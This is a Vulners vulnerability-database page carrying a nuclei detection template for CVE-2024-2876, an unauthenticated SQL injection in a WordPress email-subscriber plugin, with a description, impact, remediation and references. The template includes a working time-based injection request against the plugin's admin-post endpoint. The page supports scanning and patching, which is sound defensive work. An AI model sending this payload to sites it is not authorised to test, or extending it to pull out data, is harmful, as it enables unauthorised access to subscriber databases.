Lucene search
K

Wordpress Email Subscribers by Icegram Express - SQL Injection

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 223 Views

Wordpress Email Subscribers by Icegram Express - SQL Injection vulnerability in all versions up to 5.7.1

Related
Refs
Code
id: CVE-2024-2876

info:
  name: Wordpress Email Subscribers by Icegram Express - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Email Subscribers by Icegram Express - Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries, potentially extracting sensitive subscriber data or modifying database contents.
  remediation: |
    Update Email Subscribers plugin to a version that patches CVE-2024-2876.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-2876
    - https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/
  classification:
    epss-score: 0.80596
    epss-percentile: 0.99575
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/email-subscribers/"
  tags: time-based-sqli,cve,cve2024,wp,wordpress,wp-plugin,sqli,email-subscribers,wpscan,vkev,vuln

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

    matchers:
      - type: dsl
        dsl:
          - 'duration>=4'
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains_all(body, "bulk_action", "_sent", "errortype")'
        condition: and
# digest: 490a00463044022014ad1eaeab1f9722808189349aefd6c9bf3d9f68065307766b74ab6aca729def02203d2a022af26ce145ed045353a896655b6fbe9b1c80957b9707518b7a93ebdf27:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation